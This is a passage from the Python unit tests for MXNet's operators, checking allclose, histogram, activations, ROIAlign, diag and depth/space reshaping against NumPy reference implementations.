output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
# Report the elements this context considers "not close", together with the
# corresponding elements of the comparison (CPU/GPU/Python) result that considers them "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes))
idx_flat = np.flatnonzero(bad_indexes)
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[:, i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@with_seed()
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_context()])
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
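# Tiny worked example of the reference: np.histogram([0, 1, 2], bins=2, range=(0, 2))
# returns (array([1, 2]), array([0., 1., 2.])) -- bins [0, 1) and [1, 2], last edge inclusive.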
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support setting environment variables on the fly, so skip this there for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
# Windows doesn't support setting environment variables on the fly, so skip this there for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
length = mx.sym.Variable("length", shape=(10, 10, 10))
sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
@with_seed()
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
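# Each entry maps an activation name to [symbol builder, forward reference fn,
# gradient reference fn, test range low, test range high]; op[0]..op[4] are used in that order below.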
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
@pytest.mark.serial
def test_ravel():
# Be aware that check_symbolic_forward uses float internally for the arrays,
# which limits the representable flat-index range. With dim==4 and data drawn
# from [0, ..., 100], precision issues can already break this test.
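# ravel_multi_index flattens per-dimension indices in row-major order: for shape (3, 4)
# the multi-index (1, 2) maps to flat index 1 * 4 + 2 = 6; unravel_index inverts that mapping.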
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
@with_seed()
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
# Note: the test runs on both GPU and CPU hosts, so we cannot assert
# a specific number of GPUs here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
# Note: on a CPU-only host, CUDA sometimes cannot determine the number
# of GPUs.
if str(e).find("CUDA") == -1:
raise e
@with_seed()
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
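# The interpolated value is the area-weighted sum of the four neighbouring pixels;
# grad returns (row, col, weight) triples so the backward pass can scatter the incoming
# gradient back onto those pixels with the same weights.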
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
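# Each output bin averages roi_bin_grid_h * roi_bin_grid_w bilinear samples taken on a
# regular grid inside the bin; with position_sensitive=True the sampled input channel c_in
# additionally depends on the bin position (position-sensitive pooling).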
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
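# rois here are (batch_idx, center_x, center_y, w, h, angle_in_degrees); each sampling
# point is rotated by the ROI angle about the box center (the cos/sin transform above)
# before the bilinear lookup.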
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# Test 1d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 1d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 1d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1, axis1=1, axis2=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
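# Worked example of the reference: with blocksize=2, a (1, 4, 1, 1) input whose channel
# values are [0, 1, 2, 3] becomes the (1, 1, 2, 2) output [[0, 1], [2, 3]].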
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
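# This reference inverts the depth_to_space reference above: with blocksize=2 the
# (1, 1, 2, 2) block [[0, 1], [2, 3]] maps back to the channel values [0, 1, 2, 3].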
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
